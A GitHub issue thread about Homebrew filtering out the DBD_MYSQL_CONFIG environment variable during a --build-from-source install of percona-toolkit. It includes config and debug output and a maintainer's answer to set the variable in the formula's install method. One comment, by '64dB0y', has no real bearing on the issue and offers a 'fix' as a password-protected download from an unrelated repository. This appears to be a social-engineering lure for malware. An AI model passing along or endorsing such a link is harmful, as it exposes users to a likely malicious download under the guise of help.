### ISSUE TITLE
Environment vars for transitive dependency lost using --build-from-source

### ISSUE THREAD

**Issue by ahawkins** [Homebrew/homebrew-core#182818]
### `brew gist-logs <formula>` link OR `brew config` AND `brew doctor` output

```shell
HOMEBREW_VERSION: 4.3.18-34-g81c4351
ORIGIN: https://github.com/Homebrew/brew
HEAD: 81c4351fb50a1906f6f73411c41d507a5da3fe5d
Last commit: 9 hours ago
Core tap HEAD: acd64ccfb648e683d69d6ee77804d2add0db69cd
Core tap last commit: 3 weeks ago
Core tap JSON: 29 Aug 00:58 UTC
Core cask tap HEAD: f7a9777cbac1939b92f4d1b08bd770399f0d14ca
Core cask tap last commit: 3 weeks ago
Core cask tap JSON: 29 Aug 00:58 UTC
HOMEBREW_PREFIX: /opt/homebrew
HOMEBREW_CASK_OPTS: []
HOMEBREW_EDITOR: vim
HOMEBREW_MAKE_JOBS: 10
HOMEBREW_SORBET_RUNTIME: set
Homebrew Ruby: 3.3.4 => /opt/homebrew/Library/Homebrew/vendor/portable-ruby/3.3.4_1/bin/ruby
CPU: 10-core 64-bit arm_firestorm_icestorm
Clang: 15.0.0 build 1500
Git: 2.46.0 => /opt/homebrew/bin/git
Curl: 8.6.0 => /usr/bin/curl
macOS: 14.5-arm64
CLT: 15.3.0.0.1.1708646388
Xcode: N/A
Rosetta 2: false
```

### Verification

- [X] My `brew doctor` output says `Your system is ready to brew.` and am still able to reproduce my issue.
- [X] I ran `brew update` and am still able to reproduce my issue.
- [X] I have resolved all warnings from `brew doctor` and that did not fix my problem.
- [X] I searched for recent similar issues at https://github.com/Homebrew/homebrew-core/issues?q=is%3Aissue and found no duplicates.

### What were you trying to do (and why)?

I am trying to pass `DBD_MYSQL_CONFIG` to the `percona-toolkit` installation. This is a workaround for a dependency problem on my system. `percona-toolkit` depends on `mysql-client` which pulls in MySQL 9. This creates conflicts for me on MySQL 8. `percona-toolkit` depends on the `DBD::mysql` per module. That [library doc's](https://metacpan.org/pod/DBD::mysql::INSTALL#Environment-Variables) say I should be able to specify the location of `mysql_config` command in an environment variable. Then the installation will call to determine the complier and linker flags. 

My plan was to provide this environment variable with `--build-from-source` and `--ignore-dependencies` to prevent installing a breaking `mysql-client` on my system.

### What happened (include all command output)?

```
$ env "DBD_MYSQL_CONFIG=$(brew --prefix mysql@8.0)/bin/mysql_config"  brew install --ignore-dependencies --build-from-source --debug percona-toolkit

.... snipped ...

==> ENV
HOMEBREW_CC: clang
HOMEBREW_CXX: clang++
MAKEFLAGS: -j10
CMAKE_PREFIX_PATH: /opt/homebrew
CMAKE_INCLUDE_PATH: /Library/Developer/CommandLineTools/SDKs/MacOSX14.sdk/System/Library/Frameworks/OpenGL.framework/Versions/Current/Headers
CMAKE_LIBRARY_PATH: /Library/Developer/CommandLineTools/SDKs/MacOSX14.sdk/System/Library/Frameworks/OpenGL.framework/Versions/Current/Libraries
PKG_CONFIG_LIBDIR: /usr/lib/pkgconfig:/opt/homebrew/Library/Homebrew/os/mac/pkgconfig/14
HOMEBREW_GIT: git
HOMEBREW_SDKROOT: /Library/Developer/CommandLineTools/SDKs/MacOSX14.sdk
ACLOCAL_PATH: /opt/homebrew/share/aclocal
PATH: /opt/homebrew/Library/Homebrew/shims/mac/super:/usr/bin:/bin:/usr/sbin:/sbin
```

This includes a snippet of the environment variables when the install commands fail.

### What did you expect to happen?

My `DBD_MYSQL_CONFIG` environment variable be available when using `--build-from-source`.

### Step-by-step reproduction instructions (by running `brew` commands)

```shell
Run 

```
$ env "DBD_MYSQL_CONFIG=$(brew --prefix mysql@8.0)/bin/mysql_config"  brew install --ignore-dependencies --build-from-source --debug percona-toolkit
``` 
Look for `DBD_MYSQL_CONFIG` in the debugging output. It's absent.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ZhongRuoyu** [comment]
`brew` filters out environment variables not needed by itself. If you want this environment variable to take effect in your build, you should instead do `brew edit percona-toolkit`, and add the following line to the beginning of the `install` method:

```ruby
ENV["DBD_MYSQL_CONFIG"] = Formula["mysql@8.0"].opt_bin/"mysql_config"
```

As your core tap is outdated, you may want to run `HOMEBREW_NO_INSTALL_FROM_API=1 brew update` before that. After editing the formula, you need to run `brew install --build-from-source` with `HOMEBREW_NO_INSTALL_FROM_API=1` too.
